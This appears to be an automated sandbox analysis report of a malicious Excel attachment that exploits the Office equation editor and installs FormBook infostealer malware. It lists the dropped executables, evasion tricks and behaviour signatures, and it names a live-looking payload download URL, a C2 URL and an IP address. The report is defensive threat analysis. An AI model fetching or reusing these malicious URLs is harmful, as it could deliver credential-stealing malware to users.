Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Process created: C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab Jump to behavior
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32 Jump to behavior
Source: C:\Users\Public\vbc.exe Code function: 4_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 4_2_00403646
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$PO 65738963578 Revise Settlement.xlsx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR63D1.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@8/16@0/1
Source: C:\Users\Public\vbc.exe Code function: 4_2_004021AA CoCreateInstance, 4_2_004021AA
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\Public\vbc.exe Code function: 4_2_00404ABB GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 4_2_00404ABB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: C:\hkxhi\tnjelr\oppx\aef3432ff76843aeb030a76c099018f6\zhseks\qyypcejy\Release\qyypcejy.pdb source: vbc.exe, 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmp, idcqz.exe, 00000005.00000000.964431298.0000000000B5E000.00000002.00000001.01000000.00000005.sdmp, idcqz.exe, 00000005.00000002.972687897.0000000000B5E000.00000002.00000001.01000000.00000005.sdmp, idcqz.exe, 00000006.00000000.967212091.0000000000B5E000.00000002.00000001.01000000.00000005.sdmp, idcqz.exe.4.dr, nswAB85.tmp.4.dr
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Code function: 5_2_00B52445 push ecx; ret 5_2_00B52458
Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\BUSY[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Users\user\AppData\Local\Temp\idcqz.exe Jump to dropped file
Contains functionality to download and launch executables
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_037903A2 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_037903A2
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Boot Survival
barindex
Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Code function: 5_2_00B51890 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 5_2_00B51890
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 544 Thread sleep time: -420000s >= -30000s Jump to behavior
Found evasive API chain (may stop execution after checking a module file name)
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Users\Public\vbc.exe Code function: 4_2_00405D7A CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 4_2_00405D7A
Source: C:\Users\Public\vbc.exe Code function: 4_2_004069A4 FindFirstFileW,FindClose, 4_2_004069A4
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040290B FindFirstFileW, 4_2_0040290B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE API call chain: ExitProcess graph end node
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE API call chain: ExitProcess graph end node
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE API call chain: ExitProcess graph end node
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE API call chain: ExitProcess graph end node
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE API call chain: ExitProcess graph end node
Source: C:\Users\Public\vbc.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe API call chain: ExitProcess graph end node
Source: vbc.exe, 00000004.00000002.984898128.0000000000944000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Code function: 5_2_00B57A95 IsDebuggerPresent, 5_2_00B57A95
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Code function: 5_2_00B5558A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 5_2_00B5558A
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Code function: 5_2_00B586ED __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock, 5_2_00B586ED
Contains functionality to read the PEB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0379046B mov edx, dword ptr fs:[00000030h] 2_2_0379046B
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Code function: 5_2_0011061D mov eax, dword ptr fs:[00000030h] 5_2_0011061D
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Code function: 5_2_001106F7 mov eax, dword ptr fs:[00000030h] 5_2_001106F7
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Code function: 5_2_00110736 mov eax, dword ptr fs:[00000030h] 5_2_00110736
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Code function: 5_2_00110772 mov eax, dword ptr fs:[00000030h] 5_2_00110772
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Code function: 5_2_001103F8 mov eax, dword ptr fs:[00000030h] 5_2_001103F8
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Code function: 5_2_00B5439B SetUnhandledExceptionFilter, 5_2_00B5439B
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Code function: 5_2_00B543CC SetUnhandledExceptionFilter,UnhandledExceptionFilter, 5_2_00B543CC
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Process created: C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Code function: 5_2_00B53283 cpuid 5_2_00B53283
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Code function: 5_2_00B53EC8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 5_2_00B53EC8
Source: C:\Users\Public\vbc.exe Code function: 4_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 4_2_00403646

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 5.2.idcqz.exe.160000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.idcqz.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.972513227.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 5.2.idcqz.exe.160000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.idcqz.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.972513227.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 626146 Sample: PO 65738963578 Revise Settl... Startdate: 13/05/2022 Architecture: WINDOWS Score: 100 36 Found malware configuration 2->36 38 Malicious sample detected (through community Yara rule) 2->38 40 Antivirus detection for URL or domain 2->40 42 10 other signatures 2->42 8 EQNEDT32.EXE 12 2->8         started        13 EXCEL.EXE 34 24 2->13         started        process3 dnsIp4 32 198.12.81.20, 49173, 80 AS-COLOCROSSINGUS United States 8->32 24 C:\Users\user\AppData\Local\...\BUSY[1].exe, PE32 8->24 dropped 26 C:\Users\Public\vbc.exe, PE32 8->26 dropped 46 Office equation editor establishes network connection 8->46 48 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 8->48 15 vbc.exe 19 8->15         started        28 ~$PO 65738963578 Revise Settlement.xlsx, data 13->28 dropped file5 signatures6 process7 file8 30 C:\Users\user\AppData\Local\Temp\idcqz.exe, PE32 15->30 dropped 34 Machine Learning detection for dropped file 15->34 19 idcqz.exe 15->19         started        signatures9 process10 signatures11 44 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 19->44 22 idcqz.exe 19->22         started        process12
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
198.12.81.20
 unknown United States
36352 AS-COLOCROSSINGUS true

Contacted URLs

Name Malicious Antivirus Detection Reputation
www.cortesdisenosroutercnc.com/itq4/ true
  • Avira URL Cloud: malware
 low
http://198.12.81.20/busy/BUSY.exe true
  • Avira URL Cloud: malware
 unknown